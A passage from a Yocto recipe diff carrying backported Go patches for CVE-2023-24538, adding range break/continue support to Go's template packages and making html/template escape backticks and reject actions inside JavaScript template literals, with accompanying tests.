18Reviewed-on: https://go-review.googlesource.com/c/go/+/321491
19Trust: Russ Cox <rsc@golang.org>
20Run-TryBot: Russ Cox <rsc@golang.org>
21TryBot-Result: Go Bot <gobot@golang.org>
22Reviewed-by: Rob Pike <r@golang.org>
23
24Dependency Patch #5
25
26Upstream-Status: Backport from https://github.com/golang/go/commit/d0dd26a88c019d54f22463daae81e785f5867565
27CVE: CVE-2023-24538
28Signed-off-by: Shubham Kulkarni <skulkarni@mvista.com>
29---
30 src/html/template/context.go | 4 ++
31 src/html/template/escape.go | 71 ++++++++++++++++++++++++++++++++++-
32 src/html/template/escape_test.go | 24 ++++++++++++
33 src/text/template/doc.go | 8 ++++
34 src/text/template/exec.go | 24 +++++++++++-
35 src/text/template/exec_test.go | 2 +
36 src/text/template/parse/lex.go | 13 ++++++-
37 src/text/template/parse/lex_test.go | 2 +
38 src/text/template/parse/node.go | 36 ++++++++++++++++++
39 src/text/template/parse/parse.go | 42 ++++++++++++++++++++-
40 src/text/template/parse/parse_test.go | 8 ++++
41 11 files changed, 230 insertions(+), 4 deletions(-)
42
43diff --git a/src/html/template/context.go b/src/html/template/context.go
44index f7d4849..aaa7d08 100644
45--- a/src/html/template/context.go
46+++ b/src/html/template/context.go
47@@ -6,6 +6,7 @@ package template
48
49 import (
50 "fmt"
51+ "text/template/parse"
52 )
53
54 // context describes the state an HTML parser must be in when it reaches the
55@@ -22,6 +23,7 @@ type context struct {
56 jsCtx jsCtx
57 attr attr
58 element element
59+ n parse.Node // for range break/continue
60 err *Error
61 }
62
63@@ -141,6 +143,8 @@ const (
64 // stateError is an infectious error state outside any valid
65 // HTML/CSS/JS construct.
66 stateError
67+ // stateDead marks unreachable code after a {{break}} or {{continue}}.
68+ stateDead
69 )
70
71 // isComment is true for any state that contains content meant for template
72diff --git a/src/html/template/escape.go b/src/html/template/escape.go
73index 8739735..6dea79c 100644
74--- a/src/html/template/escape.go
75+++ b/src/html/template/escape.go
76@@ -97,6 +97,15 @@ type escaper struct {
77 actionNodeEdits map[*parse.ActionNode][]string
78 templateNodeEdits map[*parse.TemplateNode]string
79 textNodeEdits map[*parse.TextNode][]byte
80+ // rangeContext holds context about the current range loop.
81+ rangeContext *rangeContext
82+}
83+
84+// rangeContext holds information about the current range loop.
85+type rangeContext struct {
86+ outer *rangeContext // outer loop
87+ breaks []context // context at each break action
88+ continues []context // context at each continue action
89 }
90
91 // makeEscaper creates a blank escaper for the given set.
92@@ -109,6 +118,7 @@ func makeEscaper(n *nameSpace) escaper {
93 map[*parse.ActionNode][]string{},
94 map[*parse.TemplateNode]string{},
95 map[*parse.TextNode][]byte{},
96+ nil,
97 }
98 }
99
100@@ -124,8 +134,16 @@ func (e *escaper) escape(c context, n parse.Node) context {
101 switch n := n.(type) {
102 case *parse.ActionNode:
103 return e.escapeAction(c, n)
104+ case *parse.BreakNode:
105+ c.n = n
106+ e.rangeContext.breaks = append(e.rangeContext.breaks, c)
107+ return context{state: stateDead}
108 case *parse.CommentNode:
109 return c
110+ case *parse.ContinueNode:
111+ c.n = n
112+ e.rangeContext.continues = append(e.rangeContext.breaks, c)
113+ return context{state: stateDead}
114 case *parse.IfNode:
115 return e.escapeBranch(c, &n.BranchNode, "if")
116 case *parse.ListNode:
117@@ -427,6 +445,12 @@ func join(a, b context, node parse.Node, nodeName string) context {
118 if b.state == stateError {
119 return b
120 }
121+ if a.state == stateDead {
122+ return b
123+ }
124+ if b.state == stateDead {
125+ return a
126+ }
127 if a.eq(b) {
128 return a
129 }
130@@ -466,14 +490,27 @@ func join(a, b context, node parse.Node, nodeName string) context {
131
132 // escapeBranch escapes a branch template node: "if", "range" and "with".
133 func (e *escaper) escapeBranch(c context, n *parse.BranchNode, nodeName string) context {
134+ if nodeName == "range" {
135+ e.rangeContext = &rangeContext{outer: e.rangeContext}
136+ }
137 c0 := e.escapeList(c, n.List)
138- if nodeName == "range" && c0.state != stateError {
139+ if nodeName == "range" {
140+ if c0.state != stateError {
141+ c0 = joinRange(c0, e.rangeContext)
142+ }
143+ e.rangeContext = e.rangeContext.outer
144+ if c0.state == stateError {
145+ return c0
146+ }
147+
148 // The "true" branch of a "range" node can execute multiple times.
149 // We check that executing n.List once results in the same context
150 // as executing n.List twice.
151+ e.rangeContext = &rangeContext{outer: e.rangeContext}
152 c1, _ := e.escapeListConditionally(c0, n.List, nil)
153 c0 = join(c0, c1, n, nodeName)
154 if c0.state == stateError {
155+ e.rangeContext = e.rangeContext.outer
156 // Make clear that this is a problem on loop re-entry
157 // since developers tend to overlook that branch when
158 // debugging templates.
159@@ -481,11 +518,39 @@ func (e *escaper) escapeBranch(c context, n *parse.BranchNode, nodeName string)
160 c0.err.Description = "on range loop re-entry: " + c0.err.Description
161 return c0
162 }
163+ c0 = joinRange(c0, e.rangeContext)
164+ e.rangeContext = e.rangeContext.outer
165+ if c0.state == stateError {
166+ return c0
167+ }
168 }
169 c1 := e.escapeList(c, n.ElseList)
170 return join(c0, c1, n, nodeName)
171 }
172
173+func joinRange(c0 context, rc *rangeContext) context {
174+ // Merge contexts at break and continue statements into overall body context.
175+ // In theory we could treat breaks differently from continues, but for now it is
176+ // enough to treat them both as going back to the start of the loop (which may then stop).
177+ for _, c := range rc.breaks {
178+ c0 = join(c0, c, c.n, "range")
179+ if c0.state == stateError {
180+ c0.err.Line = c.n.(*parse.BreakNode).Line
181+ c0.err.Description = "at range loop break: " + c0.err.Description
182+ return c0
183+ }
184+ }
185+ for _, c := range rc.continues {
186+ c0 = join(c0, c, c.n, "range")
187+ if c0.state == stateError {
188+ c0.err.Line = c.n.(*parse.ContinueNode).Line
189+ c0.err.Description = "at range loop continue: " + c0.err.Description
190+ return c0
191+ }
192+ }
193+ return c0
194+}
195+
196 // escapeList escapes a list template node.
197 func (e *escaper) escapeList(c context, n *parse.ListNode) context {
198 if n == nil {
199@@ -493,6 +558,9 @@ func (e *escaper) escapeList(c context, n *parse.ListNode) context {
200 }
201 for _, m := range n.Nodes {
202 c = e.escape(c, m)
203+ if c.state == stateDead {
204+ break
205+ }
206 }
207 return c
208 }
209@@ -503,6 +571,7 @@ func (e *escaper) escapeList(c context, n *parse.ListNode) context {
210 // which is the same as whether e was updated.
211 func (e *escaper) escapeListConditionally(c context, n *parse.ListNode, filter func(*escaper, context) bool) (context, bool) {
212 e1 := makeEscaper(e.ns)
213+ e1.rangeContext = e.rangeContext
214 // Make type inferences available to f.
215 for k, v := range e.output {
216 e1.output[k] = v
217diff --git a/src/html/template/escape_test.go b/src/html/template/escape_test.go
218index c709660..fa2b84a 100644
219--- a/src/html/template/escape_test.go
220+++ b/src/html/template/escape_test.go
221@@ -920,6 +920,22 @@ func TestErrors(t *testing.T) {
222 "<a href='/foo?{{range .Items}}&{{.K}}={{.V}}{{end}}'>",
223 "",
224 },
225+ {
226+ "{{range .Items}}<a{{if .X}}{{end}}>{{end}}",
227+ "",
228+ },
229+ {
230+ "{{range .Items}}<a{{if .X}}{{end}}>{{continue}}{{end}}",
231+ "",
232+ },
233+ {
234+ "{{range .Items}}<a{{if .X}}{{end}}>{{break}}{{end}}",
235+ "",
236+ },
237+ {
238+ "{{range .Items}}<a{{if .X}}{{end}}>{{if .X}}{{break}}{{end}}{{end}}",
239+ "",
240+ },
241 // Error cases.
242 {
243 "{{if .Cond}}<a{{end}}",
244@@ -956,6 +972,14 @@ func TestErrors(t *testing.T) {
245 "z:2:8: on range loop re-entry: {{range}} branches",
246 },
247 {
248+ "{{range .Items}}<a{{if .X}}{{break}}{{end}}>{{end}}",
249+ "z:1:29: at range loop break: {{range}} branches end in different contexts",
250+ },
251+ {
252+ "{{range .Items}}<a{{if .X}}{{continue}}{{end}}>{{end}}",
253+ "z:1:29: at range loop continue: {{range}} branches end in different contexts",
254+ },
255+ {
256 "<a b=1 c={{.H}}",
257 "z: ends in a non-text context: {stateAttr delimSpaceOrTagEnd",
258 },
259diff --git a/src/text/template/doc.go b/src/text/template/doc.go
260index 7b30294..0228b15 100644
261--- a/src/text/template/doc.go
262+++ b/src/text/template/doc.go
263@@ -112,6 +112,14 @@ data, defined in detail in the corresponding sections that follow.
264 T0 is executed; otherwise, dot is set to the successive elements
265 of the array, slice, or map and T1 is executed.
266
267+ {{break}}
268+ The innermost {{range pipeline}} loop is ended early, stopping the
269+ current iteration and bypassing all remaining iterations.
270+
271+ {{continue}}
272+ The current iteration of the innermost {{range pipeline}} loop is
273+ stopped, and the loop starts the next iteration.
274+
275 {{template "name"}}
276 The template with the specified name is executed with nil data.
277
278diff --git a/src/text/template/exec.go b/src/text/template/exec.go
279index 7ac5175..6cb140a 100644
280--- a/src/text/template/exec.go
281+++ b/src/text/template/exec.go
282@@ -5,6 +5,7 @@
283 package template
284
285 import (
286+ "errors"
287 "fmt"
288 "internal/fmtsort"
289 "io"
290@@ -244,6 +245,12 @@ func (t *Template) DefinedTemplates() string {
291 return b.String()
292 }
293
294+// Sentinel errors for use with panic to signal early exits from range loops.
295+var (
296+ walkBreak = errors.New("break")
297+ walkContinue = errors.New("continue")
298+)
299+
300 // Walk functions step through the major pieces of the template structure,
301 // generating output as they go.
302 func (s *state) walk(dot reflect.Value, node parse.Node) {
303@@ -256,7 +263,11 @@ func (s *state) walk(dot reflect.Value, node parse.Node) {
304 if len(node.Pipe.Decl) == 0 {
305 s.printValue(node, val)
306 }
307+ case *parse.BreakNode:
308+ panic(walkBreak)
309 case *parse.CommentNode:
310+ case *parse.ContinueNode:
311+ panic(walkContinue)
312 case *parse.IfNode:
313 s.walkIfOrWith(parse.NodeIf, dot, node.Pipe, node.List, node.ElseList)
314 case *parse.ListNode:
315@@ -335,6 +346,11 @@ func isTrue(val reflect.Value) (truth, ok bool) {
316
317 func (s *state) walkRange(dot reflect.Value, r *parse.RangeNode) {
318 s.at(r)
319+ defer func() {
320+ if r := recover(); r != nil && r != walkBreak {
321+ panic(r)
322+ }
323+ }()
324 defer s.pop(s.mark())
325 val, _ := indirect(s.evalPipeline(dot, r.Pipe))
326 // mark top of stack before any variables in the body are pushed.
327@@ -348,8 +364,14 @@ func (s *state) walkRange(dot reflect.Value, r *parse.RangeNode) {
328 if len(r.Pipe.Decl) > 1 {
329 s.setTopVar(2, index)
330 }
331+ defer s.pop(mark)
332+ defer func() {
333+ // Consume panic(walkContinue)
334+ if r := recover(); r != nil && r != walkContinue {
335+ panic(r)
336+ }
337+ }()
338 s.walk(elem, r.List)
339- s.pop(mark)
340 }
341 switch val.Kind() {
342 case reflect.Array, reflect.Slice:
343diff --git a/src/text/template/exec_test.go b/src/text/template/exec_test.go
344index 3309b33..a639f44 100644
345--- a/src/text/template/exec_test.go
346+++ b/src/text/template/exec_test.go
347@@ -563,6 +563,8 @@ var execTests = []execTest{
348 {"range empty no else", "{{range .SIEmpty}}-{{.}}-{{end}}", "", tVal, true},
349 {"range []int else", "{{range .SI}}-{{.}}-{{else}}EMPTY{{end}}", "-3--4--5-", tVal, true},
350 {"range empty else", "{{range .SIEmpty}}-{{.}}-{{else}}EMPTY{{end}}", "EMPTY", tVal, true},
351+ {"range []int break else", "{{range .SI}}-{{.}}-{{break}}NOTREACHED{{else}}EMPTY{{end}}", "-3-", tVal, true},
352+ {"range []int continue else", "{{range .SI}}-{{.}}-{{continue}}NOTREACHED{{else}}EMPTY{{end}}", "-3--4--5-", tVal, true},
353 {"range []bool", "{{range .SB}}-{{.}}-{{end}}", "-true--false-", tVal, true},
354 {"range []int method", "{{range .SI | .MAdd .I}}-{{.}}-{{end}}", "-20--21--22-", tVal, true},
355 {"range map", "{{range .MSI}}-{{.}}-{{end}}", "-1--3--2-", tVal, true},
356diff --git a/src/text/template/parse/lex.go b/src/text/template/parse/lex.go
357index 6784071..95e3377 100644
358--- a/src/text/template/parse/lex.go
359+++ b/src/text/template/parse/lex.go
360@@ -62,6 +62,8 @@ const (
361 // Keywords appear after all the rest.
362 itemKeyword // used only to delimit the keywords
363 itemBlock // block keyword
364+ itemBreak // break keyword
365+ itemContinue // continue keyword
366 itemDot // the cursor, spelled '.'
367 itemDefine // define keyword
368 itemElse // else keyword
369@@ -76,6 +78,8 @@ const (
370 var key = map[string]itemType{
371 ".": itemDot,
372 "block": itemBlock,
373+ "break": itemBreak,
374+ "continue": itemContinue,
375 "define": itemDefine,
376 "else": itemElse,
377 "end": itemEnd,
378@@ -119,6 +123,8 @@ type lexer struct {
379 parenDepth int // nesting depth of ( ) exprs
380 line int // 1+number of newlines seen
381 startLine int // start line of this item
382+ breakOK bool // break keyword allowed
383+ continueOK bool // continue keyword allowed
384 }
385
386 // next returns the next rune in the input.
387@@ -461,7 +467,12 @@ Loop:
388 }
389 switch {
390 case key[word] > itemKeyword:
391- l.emit(key[word])
392+ item := key[word]
393+ if item == itemBreak && !l.breakOK || item == itemContinue && !l.continueOK {
394+ l.emit(itemIdentifier)
395+ } else {
396+ l.emit(item)
397+ }
398 case word[0] == '.':
399 l.emit(itemField)
400 case word == "true", word == "false":
401diff --git a/src/text/template/parse/lex_test.go b/src/text/template/parse/lex_test.go
402index 6510eed..df6aabf 100644
403--- a/src/text/template/parse/lex_test.go
404+++ b/src/text/template/parse/lex_test.go
405@@ -35,6 +35,8 @@ var itemName = map[itemType]string{
406 // keywords
407 itemDot: ".",
408 itemBlock: "block",
409+ itemBreak: "break",
410+ itemContinue: "continue",
411 itemDefine: "define",
412 itemElse: "else",
413 itemIf: "if",
414diff --git a/src/text/template/parse/node.go b/src/text/template/parse/node.go
415index a9dad5e..c398da0 100644
416--- a/src/text/template/parse/node.go
417+++ b/src/text/template/parse/node.go
418@@ -71,6 +71,8 @@ const (
419 NodeVariable // A $ variable.
420 NodeWith // A with action.
421 NodeComment // A comment.
422+ NodeBreak // A break action.
423+ NodeContinue // A continue action.
424 )
425
426 // Nodes.
427@@ -907,6 +909,40 @@ func (i *IfNode) Copy() Node {
428 return i.tr.newIf(i.Pos, i.Line, i.Pipe.CopyPipe(), i.List.CopyList(), i.ElseList.CopyList())
429 }
430
431+// BreakNode represents a {{break}} action.
432+type BreakNode struct {
433+ tr *Tree
434+ NodeType
435+ Pos
436+ Line int
437+}
438+
439+func (t *Tree) newBreak(pos Pos, line int) *BreakNode {
440+ return &BreakNode{tr: t, NodeType: NodeBreak, Pos: pos, Line: line}
441+}
442+
443+func (b *BreakNode) Copy() Node { return b.tr.newBreak(b.Pos, b.Line) }
444+func (b *BreakNode) String() string { return "{{break}}" }
445+func (b *BreakNode) tree() *Tree { return b.tr }
446+func (b *BreakNode) writeTo(sb *strings.Builder) { sb.WriteString("{{break}}") }
447+
448+// ContinueNode represents a {{continue}} action.
449+type ContinueNode struct {
450+ tr *Tree
451+ NodeType
452+ Pos
453+ Line int
454+}
455+
456+func (t *Tree) newContinue(pos Pos, line int) *ContinueNode {
457+ return &ContinueNode{tr: t, NodeType: NodeContinue, Pos: pos, Line: line}
458+}
459+
460+func (c *ContinueNode) Copy() Node { return c.tr.newContinue(c.Pos, c.Line) }
461+func (c *ContinueNode) String() string { return "{{continue}}" }
462+func (c *ContinueNode) tree() *Tree { return c.tr }
463+func (c *ContinueNode) writeTo(sb *strings.Builder) { sb.WriteString("{{continue}}") }
464+
465 // RangeNode represents a {{range}} action and its commands.
466 type RangeNode struct {
467 BranchNode
468diff --git a/src/text/template/parse/parse.go b/src/text/template/parse/parse.go
469index 5e6e512..7f78b56 100644
470--- a/src/text/template/parse/parse.go
471+++ b/src/text/template/parse/parse.go
472@@ -31,6 +31,7 @@ type Tree struct {
473 vars []string // variables defined at the moment.
474 treeSet map[string]*Tree
475 actionLine int // line of left delim starting action
476+ rangeDepth int
477 mode Mode
478 }
479
480@@ -223,6 +224,8 @@ func (t *Tree) startParse(funcs []map[string]interface{}, lex *lexer, treeSet ma
481 t.vars = []string{"$"}
482 t.funcs = funcs
483 t.treeSet = treeSet
484+ lex.breakOK = !t.hasFunction("break")
485+ lex.continueOK = !t.hasFunction("continue")
486 }
487
488 // stopParse terminates parsing.
489@@ -385,6 +388,10 @@ func (t *Tree) action() (n Node) {
490 switch token := t.nextNonSpace(); token.typ {
491 case itemBlock:
492 return t.blockControl()
493+ case itemBreak:
494+ return t.breakControl(token.pos, token.line)
495+ case itemContinue:
496+ return t.continueControl(token.pos, token.line)
497 case itemElse:
498 return t.elseControl()
499 case itemEnd:
500@@ -404,6 +411,32 @@ func (t *Tree) action() (n Node) {
501 return t.newAction(token.pos, token.line, t.pipeline("command", itemRightDelim))
502 }
503
504+// Break:
505+// {{break}}
506+// Break keyword is past.
507+func (t *Tree) breakControl(pos Pos, line int) Node {
508+ if token := t.next(); token.typ != itemRightDelim {
509+ t.unexpected(token, "in {{break}}")
510+ }
511+ if t.rangeDepth == 0 {
512+ t.errorf("{{break}} outside {{range}}")
513+ }
514+ return t.newBreak(pos, line)
515+}
516+
517+// Continue:
518+// {{continue}}
519+// Continue keyword is past.
520+func (t *Tree) continueControl(pos Pos, line int) Node {
521+ if token := t.next(); token.typ != itemRightDelim {
522+ t.unexpected(token, "in {{continue}}")
523+ }
524+ if t.rangeDepth == 0 {
525+ t.errorf("{{continue}} outside {{range}}")
526+ }
527+ return t.newContinue(pos, line)
528+}
529+
530 // Pipeline:
531 // declarations? command ('|' command)*
532 func (t *Tree) pipeline(context string, end itemType) (pipe *PipeNode) {
533@@ -479,8 +512,14 @@ func (t *Tree) checkPipeline(pipe *PipeNode, context string) {
534 func (t *Tree) parseControl(allowElseIf bool, context string) (pos Pos, line int, pipe *PipeNode, list, elseList *ListNode) {
535 defer t.popVars(len(t.vars))
536 pipe = t.pipeline(context, itemRightDelim)
537+ if context == "range" {
538+ t.rangeDepth++
539+ }
540 var next Node
541 list, next = t.itemList()
542+ if context == "range" {
543+ t.rangeDepth--
544+ }
545 switch next.Type() {
546 case nodeEnd: //done
547 case nodeElse:
548@@ -522,7 +561,8 @@ func (t *Tree) ifControl() Node {
549 // {{range pipeline}} itemList {{else}} itemList {{end}}
550 // Range keyword is past.
551 func (t *Tree) rangeControl() Node {
552- return t.newRange(t.parseControl(false, "range"))
553+ r := t.newRange(t.parseControl(false, "range"))
554+ return r
555 }
556
557 // With:
558diff --git a/src/text/template/parse/parse_test.go b/src/text/template/parse/parse_test.go
559index 220f984..ba45636 100644
560--- a/src/text/template/parse/parse_test.go
561+++ b/src/text/template/parse/parse_test.go
562@@ -230,6 +230,10 @@ var parseTests = []parseTest{
563 `{{range $x := .SI}}{{.}}{{end}}`},
564 {"range 2 vars", "{{range $x, $y := .SI}}{{.}}{{end}}", noError,
565 `{{range $x, $y := .SI}}{{.}}{{end}}`},
566+ {"range with break", "{{range .SI}}{{.}}{{break}}{{end}}", noError,
567+ `{{range .SI}}{{.}}{{break}}{{end}}`},
568+ {"range with continue", "{{range .SI}}{{.}}{{continue}}{{end}}", noError,
569+ `{{range .SI}}{{.}}{{continue}}{{end}}`},
570 {"constants", "{{range .SI 1 -3.2i true false 'a' nil}}{{end}}", noError,
571 `{{range .SI 1 -3.2i true false 'a' nil}}{{end}}`},
572 {"template", "{{template `x`}}", noError,
573@@ -279,6 +283,10 @@ var parseTests = []parseTest{
574 {"adjacent args", "{{printf 3`x`}}", hasError, ""},
575 {"adjacent args with .", "{{printf `x`.}}", hasError, ""},
576 {"extra end after if", "{{if .X}}a{{else if .Y}}b{{end}}{{end}}", hasError, ""},
577+ {"break outside range", "{{range .}}{{end}} {{break}}", hasError, ""},
578+ {"continue outside range", "{{range .}}{{end}} {{continue}}", hasError, ""},
579+ {"break in range else", "{{range .}}{{else}}{{break}}{{end}}", hasError, ""},
580+ {"continue in range else", "{{range .}}{{else}}{{continue}}{{end}}", hasError, ""},
581 // Other kinds of assignments and operators aren't available yet.
582 {"bug0a", "{{$x := 0}}{{$x}}", noError, "{{$x := 0}}{{$x}}"},
583 {"bug0b", "{{$x += 1}}{{$x}}", hasError, ""},
584--
5852.7.4
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2023-24538_6.patch b/meta/recipes-devtools/go/go-1.14/CVE-2023-24538_6.patch
new file mode 100644
index 0000000000..baf400b891
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2023-24538_6.patch
@@ -0,0 +1,371 @@
1From 16f4882984569f179d73967c9eee679bb9b098c5 Mon Sep 17 00:00:00 2001
2From: Roland Shoemaker <bracewell@google.com>
3Date: Mon, 20 Mar 2023 11:01:13 -0700
4Subject: [PATCH 6/6] html/template: disallow actions in JS template literals
5
6ECMAScript 6 introduced template literals[0][1] which are delimited with
7backticks. These need to be escaped in a similar fashion to the
8delimiters for other string literals. Additionally template literals can
9contain special syntax for string interpolation.
10
11There is no clear way to allow safe insertion of actions within JS
12template literals, as handling (JS) string interpolation inside of these
13literals is rather complex. As such we've chosen to simply disallow
14template actions within these template literals.
15
16A new error code is added for this parsing failure case, errJsTmplLit,
17but it is unexported as it is not backwards compatible with other minor
18release versions to introduce an API change in a minor release. We will
19export this code in the next major release.
20
21The previous behavior (with the cavet that backticks are now escaped
22properly) can be re-enabled with GODEBUG=jstmpllitinterp=1.
23
24This change subsumes CL471455.
25
26Thanks to Sohom Datta, Manipal Institute of Technology, for reporting
27this issue.
28
29Fixes CVE-2023-24538
30For #59234
31Fixes #59271
32
33[0] https://tc39.es/ecma262/multipage/ecmascript-language-expressions.html#sec-template-literals
34[1] https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Template_literals
35
36Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1802457
37Reviewed-by: Damien Neil <dneil@google.com>
38Run-TryBot: Damien Neil <dneil@google.com>
39Reviewed-by: Julie Qiu <julieqiu@google.com>
40Reviewed-by: Roland Shoemaker <bracewell@google.com>
41Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1802612
42Run-TryBot: Roland Shoemaker <bracewell@google.com>
43Change-Id: Ic7f10595615f2b2740d9c85ad7ef40dc0e78c04c
44Reviewed-on: https://go-review.googlesource.com/c/go/+/481987
45Auto-Submit: Michael Knyszek <mknyszek@google.com>
46TryBot-Result: Gopher Robot <gobot@golang.org>
47Run-TryBot: Michael Knyszek <mknyszek@google.com>
48Reviewed-by: Matthew Dempsky <mdempsky@google.com>
49
50Upstream-Status: Backport from https://github.com/golang/go/commit/b1e3ecfa06b67014429a197ec5e134ce4303ad9b
51CVE: CVE-2023-24538
52Signed-off-by: Shubham Kulkarni <skulkarni@mvista.com>
53---
54 src/html/template/context.go | 2 ++
55 src/html/template/error.go | 13 ++++++++
56 src/html/template/escape.go | 11 +++++++
57 src/html/template/escape_test.go | 66 ++++++++++++++++++++++-----------------
58 src/html/template/js.go | 2 ++
59 src/html/template/js_test.go | 2 +-
60 src/html/template/jsctx_string.go | 9 ++++++
61 src/html/template/state_string.go | 37 ++++++++++++++++++++--
62 src/html/template/transition.go | 7 ++++-
63 9 files changed, 116 insertions(+), 33 deletions(-)
64
65diff --git a/src/html/template/context.go b/src/html/template/context.go
66index f7d4849..0b65313 100644
67--- a/src/html/template/context.go
68+++ b/src/html/template/context.go
69@@ -116,6 +116,8 @@ const (
70 stateJSDqStr
71 // stateJSSqStr occurs inside a JavaScript single quoted string.
72 stateJSSqStr
73+ // stateJSBqStr occurs inside a JavaScript back quoted string.
74+ stateJSBqStr
75 // stateJSRegexp occurs inside a JavaScript regexp literal.
76 stateJSRegexp
77 // stateJSBlockCmt occurs inside a JavaScript /* block comment */.
78diff --git a/src/html/template/error.go b/src/html/template/error.go
79index 0e52706..fd26b64 100644
80--- a/src/html/template/error.go
81+++ b/src/html/template/error.go
82@@ -211,6 +211,19 @@ const (
83 // pipeline occurs in an unquoted attribute value context, "html" is
84 // disallowed. Avoid using "html" and "urlquery" entirely in new templates.
85 ErrPredefinedEscaper
86+
87+ // errJSTmplLit: "... appears in a JS template literal"
88+ // Example:
89+ // <script>var tmpl = `{{.Interp}`</script>
90+ // Discussion:
91+ // Package html/template does not support actions inside of JS template
92+ // literals.
93+ //
94+ // TODO(rolandshoemaker): we cannot add this as an exported error in a minor
95+ // release, since it is backwards incompatible with the other minor
96+ // releases. As such we need to leave it unexported, and then we'll add it
97+ // in the next major release.
98+ errJSTmplLit
99 )
100
101 func (e *Error) Error() string {
102diff --git a/src/html/template/escape.go b/src/html/template/escape.go
103index f12dafa..29ca5b3 100644
104--- a/src/html/template/escape.go
105+++ b/src/html/template/escape.go
106@@ -8,6 +8,7 @@ import (
107 "bytes"
108 "fmt"
109 "html"
110+ "internal/godebug"
111 "io"
112 "text/template"
113 "text/template/parse"
114@@ -203,6 +204,16 @@ func (e *escaper) escapeAction(c context, n *parse.ActionNode) context {
115 c.jsCtx = jsCtxDivOp
116 case stateJSDqStr, stateJSSqStr:
117 s = append(s, "_html_template_jsstrescaper")
118+ case stateJSBqStr:
119+ debugAllowActionJSTmpl := godebug.Get("jstmpllitinterp")
120+ if debugAllowActionJSTmpl == "1" {
121+ s = append(s, "_html_template_jsstrescaper")
122+ } else {
123+ return context{
124+ state: stateError,
125+ err: errorf(errJSTmplLit, n, n.Line, "%s appears in a JS template literal", n),
126+ }
127+ }
128 case stateJSRegexp:
129 s = append(s, "_html_template_jsregexpescaper")
130 case stateCSS:
131diff --git a/src/html/template/escape_test.go b/src/html/template/escape_test.go
132index fa2b84a..1b150e9 100644
133--- a/src/html/template/escape_test.go
134+++ b/src/html/template/escape_test.go
135@@ -681,35 +681,31 @@ func TestEscape(t *testing.T) {
136 }
137
138 for _, test := range tests {
139- tmpl := New(test.name)
140- tmpl = Must(tmpl.Parse(test.input))
141- // Check for bug 6459: Tree field was not set in Parse.
142- if tmpl.Tree != tmpl.text.Tree {
143- t.Errorf("%s: tree not set properly", test.name)
144- continue
145- }
146- b := new(bytes.Buffer)
147- if err := tmpl.Execute(b, data); err != nil {
148- t.Errorf("%s: template execution failed: %s", test.name, err)
149- continue
150- }
151- if w, g := test.output, b.String(); w != g {
152- t.Errorf("%s: escaped output: want\n\t%q\ngot\n\t%q", test.name, w, g)
153- continue
154- }
155- b.Reset()
156- if err := tmpl.Execute(b, pdata); err != nil {
157- t.Errorf("%s: template execution failed for pointer: %s", test.name, err)
158- continue
159- }
160- if w, g := test.output, b.String(); w != g {
161- t.Errorf("%s: escaped output for pointer: want\n\t%q\ngot\n\t%q", test.name, w, g)
162- continue
163- }
164- if tmpl.Tree != tmpl.text.Tree {
165- t.Errorf("%s: tree mismatch", test.name)
166- continue
167- }
168+ t.Run(test.name, func(t *testing.T) {
169+ tmpl := New(test.name)
170+ tmpl = Must(tmpl.Parse(test.input))
171+ // Check for bug 6459: Tree field was not set in Parse.
172+ if tmpl.Tree != tmpl.text.Tree {
173+ t.Fatalf("%s: tree not set properly", test.name)
174+ }
175+ b := new(strings.Builder)
176+ if err := tmpl.Execute(b, data); err != nil {
177+ t.Fatalf("%s: template execution failed: %s", test.name, err)
178+ }
179+ if w, g := test.output, b.String(); w != g {
180+ t.Fatalf("%s: escaped output: want\n\t%q\ngot\n\t%q", test.name, w, g)
181+ }
182+ b.Reset()
183+ if err := tmpl.Execute(b, pdata); err != nil {
184+ t.Fatalf("%s: template execution failed for pointer: %s", test.name, err)
185+ }
186+ if w, g := test.output, b.String(); w != g {
187+ t.Fatalf("%s: escaped output for pointer: want\n\t%q\ngot\n\t%q", test.name, w, g)
188+ }
189+ if tmpl.Tree != tmpl.text.Tree {
190+ t.Fatalf("%s: tree mismatch", test.name)
191+ }
192+ })
193 }
194 }
195
196@@ -936,6 +932,10 @@ func TestErrors(t *testing.T) {
197 "{{range .Items}}<a{{if .X}}{{end}}>{{if .X}}{{break}}{{end}}{{end}}",
198 "",
199 },
200+ {
201+ "<script>var a = `${a+b}`</script>`",
202+ "",
203+ },
204 // Error cases.
205 {
206 "{{if .Cond}}<a{{end}}",
207@@ -1082,6 +1082,10 @@ func TestErrors(t *testing.T) {
208 // html is allowed since it is the last command in the pipeline, but urlquery is not.
209 `predefined escaper "urlquery" disallowed in template`,
210 },
211+ {
212+ "<script>var tmpl = `asd {{.}}`;</script>",
213+ `{{.}} appears in a JS template literal`,
214+ },
215 }
216 for _, test := range tests {
217 buf := new(bytes.Buffer)
218@@ -1304,6 +1308,10 @@ func TestEscapeText(t *testing.T) {
219 context{state: stateJSSqStr, delim: delimDoubleQuote, attr: attrScript},
220 },
221 {
222+ "<a onclick=\"`foo",
223+ context{state: stateJSBqStr, delim: delimDoubleQuote, attr: attrScript},
224+ },
225+ {
226 `<A ONCLICK="'`,
227 context{state: stateJSSqStr, delim: delimDoubleQuote, attr: attrScript},
228 },
229diff --git a/src/html/template/js.go b/src/html/template/js.go
230index ea9c183..b888eaf 100644
231--- a/src/html/template/js.go
232+++ b/src/html/template/js.go
233@@ -308,6 +308,7 @@ var jsStrReplacementTable = []string{
234 // Encode HTML specials as hex so the output can be embedded
235 // in HTML attributes without further encoding.
236 '"': `\u0022`,
237+ '`': `\u0060`,
238 '&': `\u0026`,
239 '\'': `\u0027`,
240 '+': `\u002b`,
241@@ -331,6 +332,7 @@ var jsStrNormReplacementTable = []string{
242 '"': `\u0022`,
243 '&': `\u0026`,
244 '\'': `\u0027`,
245+ '`': `\u0060`,
246 '+': `\u002b`,
247 '/': `\/`,
248 '<': `\u003c`,
249diff --git a/src/html/template/js_test.go b/src/html/template/js_test.go
250index d7ee47b..7d963ae 100644
251--- a/src/html/template/js_test.go
252+++ b/src/html/template/js_test.go
253@@ -292,7 +292,7 @@ func TestEscapersOnLower7AndSelectHighCodepoints(t *testing.T) {
254 `0123456789:;\u003c=\u003e?` +
255 `@ABCDEFGHIJKLMNO` +
256 `PQRSTUVWXYZ[\\]^_` +
257- "`abcdefghijklmno" +
258+ "\\u0060abcdefghijklmno" +
259 "pqrstuvwxyz{|}~\u007f" +
